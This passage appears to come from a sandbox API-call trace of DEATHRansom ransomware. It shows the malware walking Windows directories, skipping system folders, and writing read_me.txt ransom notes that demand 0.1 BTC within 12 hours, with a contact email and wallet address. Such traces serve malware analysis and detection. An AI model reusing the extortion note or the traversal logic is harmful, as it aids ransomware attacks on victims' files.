(lpFirst="zh-tw", lpSrch="programdata") returned 0x0 [0075.063] StrStrW (lpFirst="zh-tw", lpSrch="$recycle.bin") returned 0x0 [0075.063] StrStrW (lpFirst="zh-tw", lpSrch="program files") returned 0x0 [0075.063] StrStrW (lpFirst="zh-tw", lpSrch="windows") returned 0x0 [0075.063] StrStrW (lpFirst="zh-tw", lpSrch="all users") returned 0x0 [0075.063] StrStrW (lpFirst="zh-tw", lpSrch="appdata") returned 0x0 [0075.063] GetProcessHeap () returned 0x4f10000 [0075.063] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ab0060 [0075.063] lstrcpyW (in: lpString1=0x8ab0060, lpString2="\\\\?\\C:\\Boot\\zh-TW" | out: lpString1="\\\\?\\C:\\Boot\\zh-TW") returned="\\\\?\\C:\\Boot\\zh-TW" [0075.063] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 25 [0075.063] QueueUserWorkItem (Function=0x40a710, Context=0x8ab0060, Flags=0x0) returned 1 [0075.064] GetProcessHeap () returned 0x4f10000 [0075.064] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ab0060 [0075.064] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\*") returned 19 [0075.064] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-TW\\*", lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0075.064] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\.") returned 19 [0075.064] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.064] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.064] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.064] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\..") returned 20 [0075.064] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.064] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0075.064] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\bootmgr.exe.mui") returned 33 [0075.064] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0075.064] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0075.065] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\read_me.txt") returned 29 [0075.065] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-TW\\read_me.txt" (normalized: "c:\\boot\\zh-tw\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a8 [0075.065] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.065] WriteFile (in: hFile=0x7a8, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17df5c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17df5c*=0x6b3, lpOverlapped=0x0) returned 1 [0075.067] CloseHandle (hObject=0x7a8) returned 1 [0075.067] GetProcessHeap () returned 0x4f10000 [0075.067] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ab0060 | out: hHeap=0x4f10000) returned 1 [0075.067] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="zh-tw", cAlternateFileName="")) returned 0 [0075.068] FindClose (in: hFindFile=0x7cfe8e8 | out: hFindFile=0x7cfe8e8) returned 1 [0075.068] wnsprintfW (in: pszDest=0x8ac0068, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\read_me.txt") returned 23 [0075.068] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\read_me.txt" (normalized: "c:\\boot\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x778 [0075.068] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.068] WriteFile (in: hFile=0x778, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e1d4, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17e1d4*=0x6b3, lpOverlapped=0x0) returned 1 [0075.069] CloseHandle (hObject=0x778) returned 1 [0075.069] GetProcessHeap () returned 0x4f10000 [0075.069] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ac0068 | out: hHeap=0x4f10000) returned 1 [0075.069] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x17e1e8 | out: lpFindFileData=0x17e1e8*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x4f8a8c0, dwReserved1=0x17e230, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0075.069] wnsprintfW (in: pszDest=0x8aa0058, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\bootmgr") returned 14 [0075.069] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x17e1e8 | out: lpFindFileData=0x17e1e8*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x4f8a8c0, dwReserved1=0x17e230, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0075.069] wnsprintfW (in: pszDest=0x8aa0058, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\BOOTSECT.BAK") returned 19 [0075.069] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x17e1e8 | out: lpFindFileData=0x17e1e8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f8a8c0, dwReserved1=0x17e230, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0075.069] wnsprintfW (in: pszDest=0x8aa0058, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Config.Msi") returned 17 [0075.069] lstrcmpW (lpString1="Config.Msi", lpString2="..") returned 1 [0075.069] lstrcmpW (lpString1="Config.Msi", lpString2=".") returned 1 [0075.069] StrStrW (lpFirst="config.msi", lpSrch="programdata") returned 0x0 [0075.069] StrStrW (lpFirst="config.msi", lpSrch="$recycle.bin") returned 0x0 [0075.069] StrStrW (lpFirst="config.msi", lpSrch="program files") returned 0x0 [0075.069] StrStrW (lpFirst="config.msi", lpSrch="windows") returned 0x0 [0075.069] StrStrW (lpFirst="config.msi", lpSrch="all users") returned 0x0 [0075.070] StrStrW (lpFirst="config.msi", lpSrch="appdata") returned 0x0 [0075.070] GetProcessHeap () returned 0x4f10000 [0075.070] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8a90050 [0075.070] lstrcpyW (in: lpString1=0x8a90050, lpString2="\\\\?\\C:\\Config.Msi" | out: lpString1="\\\\?\\C:\\Config.Msi") returned="\\\\?\\C:\\Config.Msi" [0075.070] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 26 [0075.070] QueueUserWorkItem (Function=0x40a710, Context=0x8a90050, Flags=0x0) returned 1 [0075.072] GetProcessHeap () returned 0x4f10000 [0075.072] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8a90050 [0075.074] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Config.Msi\\*") returned 19 [0075.074] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Config.Msi\\*", lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName=".", cAlternateFileName="")) returned 0x7cfe8e8 [0075.074] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Config.Msi\\.") returned 19 [0075.074] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.074] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.074] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="")) returned 1 [0075.074] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Config.Msi\\..") returned 20 [0075.074] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.074] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="")) returned 0 [0075.074] FindClose (in: hFindFile=0x7cfe8e8 | out: hFindFile=0x7cfe8e8) returned 1 [0075.074] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Config.Msi\\read_me.txt") returned 29 [0075.074] CreateFileW (lpFileName="\\\\?\\C:\\Config.Msi\\read_me.txt" (normalized: "c:\\config.msi\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x778 [0075.075] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.075] WriteFile (in: hFile=0x778, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e1d4, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17e1d4*=0x6b3, lpOverlapped=0x0) returned 1 [0075.076] CloseHandle (hObject=0x778) returned 1 [0075.076] GetProcessHeap () returned 0x4f10000 [0075.076] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8a90050 | out: hHeap=0x4f10000) returned 1 [0075.076] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x17e1e8 | out: lpFindFileData=0x17e1e8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x17e230, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0075.076] wnsprintfW (in: pszDest=0x8aa0058, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Documents and Settings") returned 29 [0075.076] lstrcmpW (lpString1="Documents and Settings", lpString2="..") returned 1 [0075.076] lstrcmpW (lpString1="Documents and Settings", lpString2=".") returned 1 [0075.076] StrStrW (lpFirst="documents and settings", lpSrch="programdata") returned 0x0 [0075.076] StrStrW (lpFirst="documents and settings", lpSrch="$recycle.bin") returned 0x0 [0075.076] StrStrW (lpFirst="documents and settings", lpSrch="program files") returned 0x0 [0075.076] StrStrW (lpFirst="documents and settings", lpSrch="windows") returned 0x0 [0075.076] StrStrW (lpFirst="documents and settings", lpSrch="all users") returned 0x0 [0075.076] StrStrW (lpFirst="documents and settings", lpSrch="appdata") returned 0x0 [0075.076] GetProcessHeap () returned 0x4f10000 [0075.076] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8a90050 [0075.076] lstrcpyW (in: lpString1=0x8a90050, lpString2="\\\\?\\C:\\Documents and Settings" | out: lpString1="\\\\?\\C:\\Documents and Settings") returned="\\\\?\\C:\\Documents and Settings" [0075.076] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 27 [0075.076] QueueUserWorkItem (Function=0x40a710, Context=0x8a90050, Flags=0x0) returned 1 [0075.076] GetProcessHeap () returned 0x4f10000 [0075.076] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ab0060 [0075.078] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Documents and Settings\\*") returned 31 [0075.078] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Documents and Settings\\*", lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="\x07")) returned 0xffffffff [0075.078] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Documents and Settings\\read_me.txt") returned 41 [0075.078] CreateFileW (lpFileName="\\\\?\\C:\\Documents and Settings\\read_me.txt" (normalized: "c:\\documents and settings\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x778 [0075.079] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.079] WriteFile (in: hFile=0x778, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e1d4, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17e1d4*=0x6b3, lpOverlapped=0x0) returned 1 [0075.080] CloseHandle (hObject=0x778) returned 1 [0075.080] GetProcessHeap () returned 0x4f10000 [0075.080] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ab0060 | out: hHeap=0x4f10000) returned 1 [0075.080] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x17e1e8 | out: lpFindFileData=0x17e1e8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x813b7be0, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x17e230, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0075.080] wnsprintfW (in: pszDest=0x8aa0058, cchDest=32767, pszFmt="%s\\%s" | 